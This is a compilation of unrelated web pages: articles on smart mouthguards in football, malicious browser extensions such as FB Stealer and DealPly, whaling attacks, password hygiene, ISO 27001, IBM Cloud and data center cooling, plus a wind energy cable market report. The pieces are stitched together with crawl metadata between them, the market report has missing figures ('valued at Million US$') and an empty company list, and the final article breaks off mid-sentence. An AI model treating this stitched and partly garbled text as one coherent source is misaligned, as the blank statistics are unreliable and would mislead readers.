Used in sports like football, hockey, and rugby, a smart mouthguard represents a cutting-edge integration of technology and sports equipment, designed to enhance athlete safety and health monitoring, particularly in contact sports where head impacts are a significant concern. They represent a significant advancement in sports technology, prioritizing athlete health while maintaining the integrity of the game. This device leverages advanced sensors, data analytics, and wireless communication technologies to provide a sophisticated solution for real-time monitoring and management of athletes' well-being. Here are the key capabilities and features of a smart mouthguard:
- Impact Detection: At its core, a smart mouthguard is equipped with accelerometers and gyroscopes that measure the force and direction of head impacts. These sensors can detect sudden movements or collisions, quantifying the magnitude and angle of impact, which are critical data points for assessing potential concussion risks.
- Real-time Data Transmission: The data collected by the mouthguard's sensors are transmitted in real-time to a connected device, such as a smartphone or tablet, via Bluetooth or another wireless communication protocol. This enables coaches, medical professionals, and sports scientists to receive instant alerts when a player experiences a significant impact, facilitating immediate assessment and intervention.
- Injury Prevention and Management: By analyzing the accumulated impact data, the smart mouthguard can help identify patterns or trends that may indicate an increased risk of injury. This information can be used to adjust training regimens, modify gameplay strategies, and implement targeted interventions to prevent head injuries.
- Performance Monitoring: Beyond safety, some smart mouthguards are designed to monitor physiological metrics, such as heart rate and body temperature, offering a more comprehensive view of an athlete's condition during training or competition. This data can be valuable for optimizing performance and recovery strategies.
- Customizability and Comfort: Smart mouthguards are typically made from materials that can be custom fitted to the user's teeth, ensuring comfort and minimizing interference with breathing or communication. This personalization is crucial for athlete compliance and the accuracy of the data collected.
- Data Analytics and Reporting: Coupled with sophisticated software platforms, smart mouthguards can provide detailed analytics and reports on the collected data. These insights can inform decisions on player fitness, game strategies, and long-term health monitoring, contributing to a holistic approach to athlete management.
In summary, a smart mouthguard is a multifunctional device that provides critical insights into athlete safety through real-time impact detection and physiological monitoring. Its capabilities extend from immediate injury response to long-term health and performance management, making it an invaluable tool in modern sports science and athlete care.
Navigating the Future: The Next Generation of Sports Technology
The future of wearable devices in sports is poised for transformative growth, driven by relentless innovation in Internet of Things (IoT) technologies and a deepening understanding of athlete physiology and performance metrics. As these devices become more sophisticated, they will offer even more granular insights into athlete health, extending beyond current capabilities to include advanced biomarker analysis, real-time fatigue assessment, and predictive analytics for injury prevention. Integration with augmented reality (AR) and virtual reality (VR) technologies is likely to enhance training regimes, allowing athletes to simulate competitive environments and scenarios with unprecedented accuracy and realism.
Moreover, the proliferation of AI and machine learning algorithms will enable personalized training and rehabilitation programs that adapt in real time to an athlete’s physical and mental state, optimizing performance while minimizing the risk of injury. Wearable devices will become even more unobtrusive and seamlessly integrated into sports apparel and equipment, ensuring constant monitoring without interfering with the athlete's movements or comfort.
Data privacy and security will become paramount, as the collection of sensitive health data increases, necessitating robust cybersecurity measures to protect athlete information. Collaboration among tech companies, sports organizations, and healthcare providers will likely increase, fostering an ecosystem where data sharing can lead to holistic health and performance insights.
In essence, the future of wearable devices in sports is one where technology not only augments the human experience but also creates a symbiotic relationship between athlete performance and health monitoring, propelling sports into a new era of scientific discovery and athletic achievement.
Conclusion: Towards a Safer, More Engaging Football Experience
As we conclude this exploration into the role of IoT technology in football, it's clear that the intersection of sports and technology is not just a passing trend but a fundamental shift in how we approach athlete performance, health, and safety. The examples of smart mouthguards, wearable fitness trackers, smart vests, GPS trackers, and other IoT devices highlight the depth and breadth of innovation currently reshaping the sports industry. These technologies, by providing real-time data and insights, are not only optimizing training and game strategies but also pioneering new frontiers in injury prevention and recovery.
The evolution of IoT in sports, particularly in football, underscores a broader movement towards data-driven decision-making, personalized athlete management, and enhanced fan engagement. As we look to the future, the potential for further innovation seems limitless. With advancements in AI, machine learning, AR, and VR, the next generation of wearables will likely offer even deeper insights into athlete health and performance, blurring the lines between the physical and digital realms in sports.
This journey through the integration of IoT technologies in football reveals a landscape ripe with opportunities for improving athlete welfare and game integrity. It's a testament to the power of technology to not only enhance the competitive edge but also safeguard the health and well-being of those at the heart of the sport. As we embrace this new era, the continued collaboration among technologists, healthcare professionals, and sports organizations will be crucial in realizing the full potential of IoT in sports. The goal is clear: to harness the power of technology to foster a safer, more dynamic, and more engaging sporting experience for all.
In closing, the role of IoT technology in football is a compelling narrative of innovation, safety, and performance. As we move forward, the commitment to leveraging technology for the betterment of the sport and its athletes will undoubtedly continue to drive the evolution of football, promising a future where the game is not only more exciting to watch but also safer to play. The journey of integrating IoT into sports is just beginning, and its impact will resonate far beyond the football field, setting new standards for how we engage with, understand, and enhance the world of sports. | <urn:uuid:89919577-3ec4-486f-b55d-cca26fe7de22> | CC-MAIN-2024-38 | https://iotmktg.com/revolutionizing-football-the-impact-of-iot-technology-on-the-game/ | 2024-09-12T18:03:13Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651491.39/warc/CC-MAIN-20240912174615-20240912204615-00056.warc.gz | en | 0.926882 | 2,671 | 2.828125 | 3 |
Each of us has probably installed some kind of browser extension at least once: an ad blocker, an online translator, a spellchecker or something else. However, few of us stop to think: is it safe? Unfortunately, these seemingly innocuous mini-apps can be far more dangerous than they seem at first glance. Let’s see what might go wrong. For this, we shall use data from our experts’ recent report on the most common families of malicious browser extensions.
What are extensions and what do they do?
Let’s start with the basic definition and identify root of the problem. A browser extension is a plug-in that adds functionality to your browser. For example, they can block ads on web pages, make notes, check spelling and much more. For popular browsers there are official extension stores that help select, compare and install the plug-ins you want. But extensions can also be installed from unofficial sources.
It’s important to note that, for an extension to do its job, it will need permission to read and change the content of web pages you view in the browser. Without this access, it will likely be completely useless.
In the case of Google Chrome, extensions will require the ability to read and change all your data on all websites you visit. Looks like a big deal, right? However, even official stores draw little attention to it.
For example, in the official Chrome Web Store, the Privacy practices section of the popular Google Translate extension states that it collects information about location, user activity and website content. But the fact that it needs access to all data from all websites in order to work, isn’t revealed to the user until they’re installing the extension.
Many if not most users probably won’t even read this message and will automatically click Add extension to start using the plugin right away. All of this creates an opportunity for cybercriminals to distribute adware and even malware under the guise of what appears to be harmless extensions.
As for adware extensions, the right to alter the displayed content allows them to show ads on the sites you visit. In this case, the extension creators earn money from users clicking tracked affiliate links to advertisers’ websites. For better targeted ad content, they may also analyze your search queries and other data.
Things are even worse when it comes to malicious extensions. Access to the content of all visited websites allows an attacker to steal card details, cookies and other sensitive information. Let’s look at some examples.
Rogue tools for Office files
In recent years, cybercriminals have been actively spreading malicious WebSearch adware extensions. Members of this family are usually disguised as tools for Office files, for example, for Word-to-PDF conversion.
Most of them even perform their stated function. But then, after installation, they replace the usual browser homepage with a mini-site with a search bar and tracked affiliate links to third-party resources, such as AliExpress or Farfetch.
Once installed, the extension also changes the default search engine to something called search.myway. This allows cybercriminals to save and analyze user search queries and feed them with more relevant links according to their interests.
At present, WebSearch extensions are no longer available in the official Chrome store, but they can still be downloaded from third-party resources.
Adware add-on that won’t leave you be
Members of DealPly, another common family of adware extensions, usually sneak onto people’s computers along with pirated content downloaded from dubious sites. They work in roughly the same way as WebSearch plugins.
DealPly extensions likewise replace the browser homepage with a mini-site with affiliate links to popular digital platforms, and just like malicious WebSearch extensions, they substitute the default search engine and analyzes user search queries to create more tailored ads.
What’s more, members of the DealPly family are extremely difficult to get rid of. Even if the user removes the adware extension, it will reinstall on their device each time the browser is opened.
AddScript hands out unwanted cookies
Extensions from the AddScript family often masquerade as tools for downloading music and videos from social networks, or proxy server managers. However, on top of this functionality, they infect the victim’s device with malicious code. The attackers then use this code to view videos in the background without the user noticing and earn income from boosting the number of views.
Another source of income for cybercriminals is downloading cookies to the victim’s device. Generally speaking, cookies are stored on the user’s device when they visit a website and can be used as a kind of digital marker. In a normal situation, affiliated sites promise to take customers to a legitimate site. For this, they attract users to their own site, which, again, in a normal situation, is done by means of interesting or useful content. Then, they store a cookie on the user’s computer, and send them to the target site with a link. Using this cookie, the site understands where the new customer has come from and pays the partner a fee — sometimes for the redirect itself, sometimes a percentage of any purchase made, and sometimes for a certain action, such as registration.
AddScript operators employ a malicious extension to abuse this scheme. Instead of sending real website visitors to partners, they download multiple cookies onto the infected devices. These cookies serve as markers for the scammers’ partner program, and the AddScript operators receive a fee. In fact, they don’t attract any new customers at all, and their “partner” activity consists of infecting computers with these malicious extensions.
FB Stealer — a cookie thief
FB Stealer, another family of malicious extensions, works differently. Unlike AddScript, members of this family don’t download “extras” to the device, rather they steal important cookies. Here’s how it works.
The FB Stealer extension gets onto users’ devices together with the NullMixer Trojan, which the victims usually pick up when trying to download a hacked software installer. Once installed, the Trojan modifies the file used to store the Chrome browser settings, including information about extensions.
Then, after activation, FB Stealer pretends to be the Google Translate extension, so that users let their guard down. The extension does look very convincing, the only downside for the attackers being the browser warning that the official store contains no information about it.
Members of this family also substitute the browser’s default search engine, but that is not the most unpleasant thing about these extensions. FB Stealer’s main function is to steal session cookies from users of the world’s largest social network, hence the name. These are the same cookies that allow you to bypass logging in every time you visit the site — and they also allow attackers to gain entry without a password. Having hijacked an account in this way, they can then, for example, message the victim’s friends and relatives asking for money.
How to stay safe
Browser extensions are useful tools, but it’s important to treat them with caution and realize they’re not nearly as harmless as one might think. Therefore, we recommend the following security measures:
- Download extensions only from official sources. Remember that this is no watertight security guarantee — malicious extensions do manage to penetrate official stores every now and again. But such platforms usually care about user safety, and eventually manage to remove malicious extensions.
- Don’t install too many extensions and regularly check the list. If you see something that you didn’t install yourself, it’s a bright red flag.
- Use a reliable security solution. | <urn:uuid:6e659bc6-6ee9-499c-bc4e-790da3178028> | CC-MAIN-2024-38 | https://www.kaspersky.com/blog/dangers-of-browser-extensions/45448/ | 2024-09-13T21:30:04Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00856.warc.gz | en | 0.924093 | 1,607 | 2.6875 | 3 |
Every business is vulnerable to whaling attacks. Similar to phishing, whaling is a digital attack but with a much larger target. In this article, our IT support team in LA gives you an idea of what whaling attacks are and how you can prevent them.
The Basics of Whaling Attacks
Whaling attacks are a high-level form of spear phishing. In most cases, whaling attacks target C-level employees such as CFOs or COOs. This type of attack is centered on a hacker trying to manipulate the individual in question in order to obtain valuable information or money. The word “whaling” is a reference to the target’s comparably meaningful title.
How Whaling Differs from Phishing
Regular phishing is more broad-based while whaling is quite targeted. Phishing centers on spamming others through email. If only a few targets respond to the email messages, they are considered a success. Phishing attacks center on requesting money from the targeted individuals with the promise of a larger repayment in the future. The criminal takes the money and disappears.
Spear phishing attacks are different in that the attacker pinpoints his or her target, learns about that target and shapes the attack in a strategic manner. The spear phisher often selects an individual in a large company’s IT department, learns about his or her habits, and uses that information to develop a rapport. Social engineering is also used to obtain access to valuable information or transfer funds.
While spear phishing attacks zero in on normal people, whaling attacks go for comparably large fish who have the potential to transfer important trade secrets or a significant amount of money. Whaling attacks often stress the urgency of the matter. A sense of urgency encourages the target to act quickly rather than think things through. Such attacks are often made with the threat of PR exposure or an expensive lawsuit, encouraging the target to fork over the information or money. Other whaling attacks center on impersonating another individual to convince the target to turn over money or information.
Educate Your Team to Prevent Whaling Attacks
Employee education is the best means of preventing whaling attacks. Our IT support team in LA can help you educate your personnel. Detail whaling attack tactics to your team and encourage them to watch out for such attacks. If your C-level employees have social media, those accounts should be set to private. Furthermore, it will help if emails from outside of the organization are flagged for review.
Advanced Networks Is On Your Side
Our IT support team in LA is at your service. Whether you are worried about digital attacks or need tech assistance, we are here to help. Reach out to us today to find out more about our services and schedule an initial consultation. | <urn:uuid:0e15bcb7-3815-4237-9d37-34324a044ae5> | CC-MAIN-2024-38 | https://adv-networks.com/our-it-support-team-la-explains-whaling-attacks-and-how-to-avoid-them/ | 2024-09-16T09:27:55Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651682.69/warc/CC-MAIN-20240916080220-20240916110220-00656.warc.gz | en | 0.955804 | 565 | 2.609375 | 3 |
Wind energy cables is a normally a combination of high quality, thermosetting, rubber insulation, and sheathing. These cables require to be resistant to standard temperature ranges between -40°C and 90°C. The wind farms location mainly depends on whether it is onshore or offshore. Moreover, it is expected that wind energy cables resist different types of weather conditions such as high winds, salt water and extreme low/high temperatures. The cables which are installed within the nacelle and tower of a wind turbine are faced with a severe environment that includes flexing, vibration, electromagnetic interference, high-torsion stress, oil and ozone. Additionally, the wind energy cables also need to be resistant to fuel, coolant, oil, corrosive chemicals, and abrasion.
The market is driven mainly by one of the major factor such as increasing investment in offshore wind turbines. The growing preference for renewable power and rising requirement to lower the carbon emissions are some of the other factors which are further driving the growth of the market. Additionally, the enhancements in the wire technology is one of the major trends that will contribute to the growth of the market. The increasing demand for power may boost the market growth. The population is increasing exponentially and is expected to grow more in future, therefore this will lead to rise the demand for the power.
Market Classification and Overview
The global wind energy cable is segmented into product type, application, and region. Based on the product type, the market is segmented into low-voltage power cables (600 v) and medium-voltage power cables (15 to 46 kv). On the basis of application, the market is segmented into power transmission, information transfer, and others.
Geographically, the global wind energy cable is bifurcated into four regions such as North America, Europe, Asia Pacific (APAC), and Latin America, Middle East & Africa (LAMEA). North America is expected to be the highest in expenditure during the forecast period in terms of upgrade programs and maintenance, repair, operations (MRO). Rapid urbanization and industrialization in this region is expected to improve energy demand, which in turn drives the market. Europe is expected to hold the major share during the forecast period owing to the growing installation of wind farms, growing investments in installation of offshore wind farms, and aging of older wind farms. Asia Pacific is expected to account for the second largest market owing to the increasing government support through different subsidies, growing turbine demands from existing and proposed wind farms, and cheap raw material availability. Additionally, LAMEA is estimated to have the steady growth owing to the less government support and poor economic condition.
Wind Energy Cable Market Report Coverage
Market | Wind Energy Cable Market |
Wind Energy Cable Market Analysis Period | 2018 - 2030 |
Wind Energy Cable Market Base Year | 2021 |
Wind Energy Cable Market Forecast Data | 2022 - 2030 |
Market Stratification | By Product Types, By Application, And By Geography |
Wind Energy Cable Market Regional Scope | North America, Europe, Asia-Pacific, Latin America, Middle East and Africa (MEA) |
Report Coverage |
Market Trends, Drivers, Restraints, Porter's Five Forces Analysis, Competitive Analysis, Player Profiling, Value Chain Analysis |
Key Companies Profiled | Nexans, ABB, General Cable, JDR, Prysmian Group, Parker Scanrope, NSW, LS Cable & System, NKT, Others |
The global wind energy cable market was valued at Million US$ in 2017 and is projected to reach Million US$ by 2026, at a CAGR of during the forecast period. In this study, 2017 has been considered as the base year and 2018 to 2026 as the forecast period to estimate the market size for wind energy cable.
The wind energy cable market comprises of some of the major players such as
For instance, in January 2018, Nexans, a global cabling solutions company acquired a controlling interest in BE CableCon, a Denmark-based manufacturer and supplier of cable kits for wind turbines
Wind Energy Cable Market Market By Product Type
Wind Energy Cable Market Market By Application
Wind Energy Cable Market Market By Geography
The Middle East & Africa (MEA)
Availability - we are always there when you need us
Fortune 50 Companies trust Acumen Research and Consulting
of our reports are exclusive and first in the industry
more data and analysis
reports published till date | <urn:uuid:c23d42f3-0d2c-42cf-ae6f-cf7a28cef41e> | CC-MAIN-2024-38 | https://www.acumenresearchandconsulting.com/wind-energy-cable-market | 2024-09-18T20:30:27Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00456.warc.gz | en | 0.926307 | 911 | 2.671875 | 3 |
It’s a new year, so it’s time to start counting days until we hear about the first database breach of 2014 to reveal a few million passwords. Before that inevitable compromise happens, take the time to clean up your web accounts and passwords. Don’t be a prisoner to bad habits.
There’s no reason to reuse a password across any account. Partition your password choices so that each account on each web site uses a distinct value. This prevents an attacker who compromises one password (hashed or otherwise) from jumping to another account that uses the same credentials.
At the very least, your email, Facebook, and Twitter accounts should have different passwords. Protecting email is especially important because so many sites rely on it for password resets.
And if you’re still using the password kar120c I salute your sci-fi dedication, but pity your password creation skills.
Next, consider improving account security through the following steps.
Consider Using OAuth — Passwords vs. Privacy
Many sites now support OAuth for managing authentication. Essentially, OAuth is a protocol in which a site asks a provider (like Facebook or Twitter) to verify a user’s identity without having to reveal that user’s password to the inquiring site. This way, the site can create user accounts without having to store passwords. Instead, the site ties your identity to a token that the provider verifies. You prove your identify to Facebook (with a password) and Facebook proves to the site that you are who you claim to be.
If a site allows you to migrate an existing account from a password-based authentication scheme to an OAuth-based one, make the switch. Otherwise, keep this option in mind whenever you create an account in the future.
But there’s a catch. A few, actually. OAuth shifts a site’s security burden from password management to token management and correct protocol implementation. It also introduces privacy considerations related to centralizing auth to a provider as well as how much providers share data.
Be wary about how sites mix authentication and authorization. Too many sites ask for access to your data in exchange for using something like Facebook Connect. Under OAuth, the site can assume your identity to the degree you’ve authorized, from reading your list of friends to posting status updates on your behalf.
Grant the minimum permissions whenever a site requests access (i.e. authorization) to your data. Weigh this decision against your desired level of privacy and security. For example, a site or mobile app might insist on access to your full contacts list or the ability to send Tweets. If this is too much for you, then forego OAuth and set up a password-based account.
(The complexity of OAuth has many implications for users and site developers. We’ll return to this topic in future articles.)
Two-Factor Auth — One Equation in Two Unknowns
Many sites now support two-factor auth for supplementing your password with a temporary passcode. Use it. This means that access to your account is contingent on both knowing a shared secret (the password you’ve given the site) and being able to generate a temporary code.
Your password should be known only to you because that’s how you prove your identity. Anyone who knows that password — whether it’s been shared or stolen — can use it to assume your identity within that account.
A second factor is intended to be a stronger proof of your identity by tying it to something more unique to you, such as a smartphone. For example, a site may send a temporary passcode via text message or rely on a dedicated app to generate one. (Such an app must already have been synchronized with the site; it’s another example of a shared secret.) In either case, you’re proving that you have access to the smartphone tied to the account. Ideally, no one else is able to receive those text messages or generate the same sequence of passcodes.
The limited lifespan of a passcode is intended to reduce the window of opportunity for brute force attacks. Imagine an attacker knows the account’s static password. There’s nothing to prevent them from guessing a six-digit passcode. However, they only have a few minutes to guess one correct value out of a million. When the passcode changes, the attacker has to throw away all previous guesses and start the brute force anew.
The two factor auth concept is typically summarized as the combination of “something you know” with “something you possess”. It really boils down to combining “something easy to share” with “something hard to share”.
Beware Password Recovery — It’s Like Shouting Secret in a Crowded Theater
If you’ve forgotten your password, use the site’s password reset mechanism. And cross your fingers that the account recovery process is secure. If an attacker can successfully exploit this mechanism, then it doesn’t matter how well-chosen your password was (or possibly even if you’re relying on two-factor auth).
If the site emails you your original password, then the site is insecure and its developers are incompetent. It implies the password has not even been hashed.
If the site relies on security questions, consider creating unique answers for each site. This means you’ll have to remember dozens of question/response pairs. Make sure to encrypt this list with something like the OS X Keychain.
Review Your OAuth Grants
For sites you use as OAuth providers (like Facebook, Twitter, Linkedin, Google+, etc.), review the third-party apps to which you’ve granted access. You should recognize the sites that you’ve just gone through a password refresh for. Delete all the others.
Where possible, reduce permissions to a minimum. You’re relying on this for authentication, not information leakage.
Universal adoption of HTTPS remains elusive. Fortunately, sites like Facebook and Twitter have set this by default. If the site has an option to force HTTPS, use it. After all, if you’re going to rely on these sites for OAuth, then the security of these accounts becomes paramount.
Maintain Constant Vigilance
Keep your browser secure. Keep your system up to date. Set a reminder to go through this all over again a year from now — if not earlier.
Otherwise, you risk losing more than one account should your password be exposed among the millions. You are not a number, you’re a human being. | <urn:uuid:9b788b30-255c-44b9-802e-863b459db138> | CC-MAIN-2024-38 | https://deadliestwebattacks.com/archive/2014-01-06-audit-accounts-partition-passwords-stay-secure | 2024-09-08T00:02:26Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00556.warc.gz | en | 0.915725 | 1,371 | 2.65625 | 3 |
What is ISO 27001: Information Security Standard?
As an information security standard, ISO 27001 can be beneficial to understand and comply with, but what exactly is ISO 27001?
What does ISO 27001 mean? ISO 27001 is a regulation for Information Security Management Systems, which explains physical and logical controls an organization should abide by to protect their information more methodically.
What Are ISO 27000 Standards?
The International Organization for Standardization (ISO) is an international organization dedicated to developing practical standards around technical and professional operations such that any organization can follow them.
The ISO 27000 series is one such group of standards published by the ISO to address cybersecurity concerns in private organizations. This series covers several approaches to cybersecurity, from IT and network security to auditor guidelines and industry-specific practices.
Some of the primary documents in this series, found in the earliest sequential publications, include:
- ISO/IEC 27001, “Information technology – security techniques – information security management systems – requirements”: ISO 27001 covers the specifics of creating and implementing Information Security Management Systems (ISMS), which we will cover in more detail in this blog.
- ISO/IEC 27002, “Information security, cybersecurity and privacy protection – information security controls”: A list of specific security controls that may be used as part of an ISMS.
- ISO/IEC 27003, “information security management system implementation guidance”: As the title implies, this document guides on implementing ISMSs. More specifically, this will break down the requirements outlined in ISO 27001 to provide specifics on how to implement them in real-world enterprise situations.
- ISO/IEC 27004, “Information technology – security techniques, information security management – monitoring, measurement, analysis, and evaluation”: This publication provides specific requirements and practices that enterprises using an ISMS would use to evaluate effectiveness. This practice includes creating metrics, measuring data, monitoring system components, and more.
These are just the tip of this iceberg, as the ISO 27000 series has over 60 individual publications. For the most part, however, ISO 27001 is the most commonly adopted standard.
What Is ISO 27001?
ISO 27001 is a standard for developing an ISMS, a unique designation for an organization-wide network of people, processes, rules, and technologies that promote security. These can include documented processes or informal practices for specific problems, but both will fall under an overarching management plan tailored to specific security goals.
What Is an Information Security Management System?
In the broadest sense, an ISMS focuses on addressing the so-called CIA triad of security concerns:
- Confidentiality: That data remains confidential and secured against unauthorized disclosure.
- Integrity: That data remains whole and unaltered due to malicious tampering or corruption through improper processing or technology failures.
- Availability: That data remains accessible to authorized persons for business use or customer/client/patient support.
Furthermore, an ISMS will allow an organization to accomplish a set of objectives, including:
Identifying stakeholders in an organization to determine IT security expectations.
Identifying risks to technology and data security
Defining security controls to address concerns and expectations and mitigate risks
Setting security objectives organization-wide for IT systems
Implementing controls and mitigation efforts in line with security objectives
Measure and monitor controls for effectiveness
Improve controls in cases of new threats, breaches, or ineffective operation
The ISMS isn’t a specific set of technology, but the governance policies around what needs to be secured, how, by whom, and how effectively. The ISMS, therefore, should be able to address compliance and legal requirements, organizational and enterprise goals, and operational necessities like data usability and budget.
What Are the ISO 27001 Requirements?
The ISO 27001 documentation defines several requirements for an ISMS. These requirements are defined in this document, and any future documents take these requirements as a reference in helping an organization implement the ISMS.
The requirements of an ISMS are:
- Context and Organization: Your organization must understand its own business context, including security needs, internal and external stakeholders, industry and regulatory standards, and potential fallout from ineffective security or data breach.
- Leadership: Your organization must have the leadership to create, implement, and maintain an ISMS. This can include specific executives (CIOs, CTOs, CISOs), compliance officers, IT management, and stakeholders or their representatives.
- Planning: Your organization should plan the ISMS with clear information (usually from knowledge fulfilling the first requirement). This can also include vulnerability scans, risk assessments, and other diagnostics.
- Support: Your organization must be able to allocate and distribute resources to teams managing the ISMS. This includes having the ability to communicate with team members, create organization-wide policies and education, and distribute guides, documentation, and best practices.
- Operation: All processes for any aspect of the ISMS must be implemented and controlled. This includes implementing risk assessments for those processes.
- Evaluation: Your organization must monitor, analyze, and assess the ISMS during its operation. This calls for internal audits and reviews.
- Improvement: Based on the results of any internal tests, measurements, or audits, your organization should be able to implement changes and improvements, including system upgrades, retirement and replacement of equipment, changes to policies, or mitigation efforts following breaches.
The 14 Domains of ISO 27001
Finally, the requirements of ISO 27001 will cover 14 specific domains, including several control categories, of security and operations in your organization. These domains include:
- Information Security Policies, or aligning security policies with company goals
- Information Security Organization, or the establishment of management and personnel structures and maintaining the security of tools used by those teams.
- Human Resource Security, or securing personnel and data involved in HR operations.
- Asset Management, or the identification, classification, and protection of governed assets – including data and processing resources.
- Access Control, or maintaining restricted access to processing and data resources for only authorized users related to their role in the organization.
Cryptography, or the obfuscation of data at rest or in transit. - Physical and Environmental Security, or protecting physical processing facilities against damage, theft, or disaster.
- Operations Security, or the safeguarding of processing facilities against unauthorized access or data loss.
- Communications Security, or data protection as it moves through business networks.
- System Acquisition, Development, and Maintenance, or the securely strategizing and planning of acquiring, expanding, and retiring system equipment.
- Supplier Relations, or analyzing third-party vendor relationships and agreements
- Information Security Incident Management, or detecting and responding to security issues as they happen.
- Information Security Aspects of Business Continuity, or ensuring that security measures will remain effective in cases of business disruptions.
- Compliance, or integrating any regulations or frameworks specific to business or industry operations.
Stay On Top of ISO 27001 Certification with 1Kosmos
While ISO 27001 isn’t a mandatory regulation, it is a strong and productive framework around which organizations should build their cybersecurity and compliance efforts. It touches on several baseline security elements considered best practices across most industries.
1Kosmos BlockID provides this level of security with the following features:
- Private and Permissioned Blockchain: 1Kosmos protects personally identifiable information in a private and permissioned blockchain, encrypts digital identities, and is only accessible by the user. The distributed properties ensure no databases to breach or honeypots for hackers to target.
- Identity-Based Authentication: We push biometrics and authentication into a new “who you are” paradigm. BlockID uses biometrics to identify individuals, not devices, through credential triangulation and identity verification.
- Cloud-Native Architecture: Flexible and scalable cloud architecture makes it simple to build applications using our standard API and SDK.
- Identity Proofing: BlockID verifies identity anywhere, anytime and on any device with over 99% accuracy.
- Privacy by Design: Embedding privacy into the design of our ecosystem is a core principle of 1Kosmos. We protect personally identifiable information in a distributed identity architecture, and the encrypted data is only accessible by the user.
- Interoperability: BlockID can readily integrate with existing infrastructure through its 50+ out-of-the-box integrations or via API/SDK. | <urn:uuid:917e3dbf-e4f0-45e0-96ee-3590061c21a0> | CC-MAIN-2024-38 | https://www.1kosmos.com/authentication/what-is-iso-27001-information-security-standard/ | 2024-09-08T01:00:26Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00556.warc.gz | en | 0.908836 | 1,741 | 2.984375 | 3 |
Introduction to IBM Cloud
In this digital era, it is all about Data and storage. This created the need for Cloud Computing and Cloud storage. There are various reputed Cloud Platforms and one of them is IBM Cloud.
If this is the first time you are hearing about the IBM Cloud or Are you interested to know further details about IBM Clouds? Then you are in the right place.
Here in this article, you will get a basic understanding of the IBM Cloud and its features. But before seeing it, here is a short intro for you to Cloud Computing.
What is Cloud Computing?
In simple words, the cloud refers to the virtual storage space or computing resources that are not physically owned by the user but used for his/her business.
The rapid development in the IT sector created the need for more storage, servers, analysis, and research, to reduce the operating cost the resources needed are purchased from the Cloud Computing platform which provides the services like servers, storage, software analytics, Artificial Intelligence on Internet.
What is IBM Cloud?
IBM Cloud refers to the suite of American-based Information Technology company IBM that provides the cloud computing services both Platform as a Service (PaaS) and Infrastructure as a Service (IaaS). (SaaS vs PaaS)
The Platform is designed to serve the full range of applications both small development teams and organizations and also large enterprise businesses. The IBM cloud networks have more than 60 data centers and servers in 19 countries around the Globe.
It supports various programming languages such as Java, PHP, and Python, etc… It supports modern, cloud-native apps and other microservices and the Internet of Things (IoT).
Product and Services covered under IBM Cloud:
IBM Cloud Catalog lists over 170 services in different categories here are some of them –
- Computing – bare metal servers, virtual servers, and other computing resources
- Storage – Storage of Images, files, Data, and other objects
- Security – Activity tracking, Access management, authentication, etc…
- Analytics – Data Science tools like Apache Spark, Apache Hadoop, and IBM Watson Machine Learning, and also Analytics for streaming data.
- Internet of Things (IoT) – IBM’s IoT and the data produced by them.
- Blockchain – Software-as-a-Service (SaaS) to develop apps and monitor blockchain networks.
- Network – load balance, Content Delivery Network (CDN), Virtual Private Network (VPN), and firewalls.
- Data Management – SQL and NoSQL databases, data querying, and migration tools.
- Mobile – Helps in building and monitoring mobile applications and their back-end components.
- Developer and Migration Tools – Command-line Interface (CLI), tools for continuous delivery, application pipelines, continuous-release, and migration tools like IBM life CLI and Cloud Mass Data Migration.
- Integration – Provides various integration options like API Connect, IBM Secure Gateway, and APP Connect, etc…
Types of IBM Cloud Plans
The Cloud services provided by IBM can be divided into three types here, are they –
i) Public Cloud
Here the users rent the cloud resources on a subscription basis or usage-based fee. Everything is managed and owned by IBM. You don’t need to own any software or hardware; everything will be available under your plan.
IBM Cloud is trusted by 47 companies of the Fortune 50 and 10 largest banks and 8 out of 10 largest Airlines. It has various advantages like Ease of Use, Industry-leading compliance, Threat monitoring, and security.
ii) Private Cloud
Here instead of renting a public place or server, you will be allocated with your own private Cloud space which will be fully under your control. Companies choose IBM Private Cloud to meet regulatory compliance, to deal with confidential documents, intellectual property, medical records, financial data, or sensitive data.
The IBM Private Cloud has the following advantages – elasticity, scalability, ease of service delivery, control, security, and resource customization.
iii) Hybrid Cloud
IBM Hybrid Cloud refers to the integrated environment of both private and public cloud. The Hybrid cloud helps companies to easily manage speed, security, latency, and Performance. It is cost-efficient than doing business with private or public cloud alone.
It is said in the next 3 years, 75% of the existing non-cloud apps will move to the cloud. And it is said the cloud journey has only started now. While comparing to other cloud platforms IBM has many advantages. So if you are planning to Cloud then IBM is a good choice for you.
If you have any questions or doubts in the comment section below, and if you want to know more about any other Cloud platforms please let us know. | <urn:uuid:3e93d949-1fa3-4740-a02e-1e6b9d322aa1> | CC-MAIN-2024-38 | https://networkinterview.com/ibm-cloud-an-overview/ | 2024-09-10T09:53:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651241.17/warc/CC-MAIN-20240910093422-20240910123422-00356.warc.gz | en | 0.92017 | 981 | 2.828125 | 3 |
Data centers are getting denser, much denser. In 2017 a majority of operators – 67 percent – reported an average rack density of below six kilowatts (kW), and just nine percent had average densities of over 10kW per rack according to numbers from the Uptime Institute.
But as of 2022, the average rack density has crept up to eight to ten kW per rack. Meanwhile, 25 percent of data centers are now reporting rack densities of over 20kW, and five percent now have densities north of 50kW.
Some analysts have even predicted that by 2025, average densities could reach 15 to 20kW per rack. While multi-story developments have become increasingly common, the growing densities may limit data centers in the future to one or two stories in order for the heat rejection equipment to fit on data center roofs.
This trend of denser data centers is unlikely to disappear soon. Many of the areas that need data the most are getting much stricter in terms of how they issue planning permissions. For instance, due to concerns about the capacity of Ireland’s grid, the country’s national electricity grid operator – Eirgrid – has stopped issuing new connections to data centers in the Dublin area until 2028.
Of course, larger, denser data centers are now producing more raw heat than ever, which, with space being at a premium, can often mean less room to accommodate the cooling systems required to tackle such loads.
DCD spoke to industry stalwart Keith Dunnavant of Munters, a global specialist in energy-efficient air treatment and climate solutions, to find out how the company’s award-winning cooling system, SyCool Split, can help operators keep their cool, no matter the size of their facility.
A problem shared
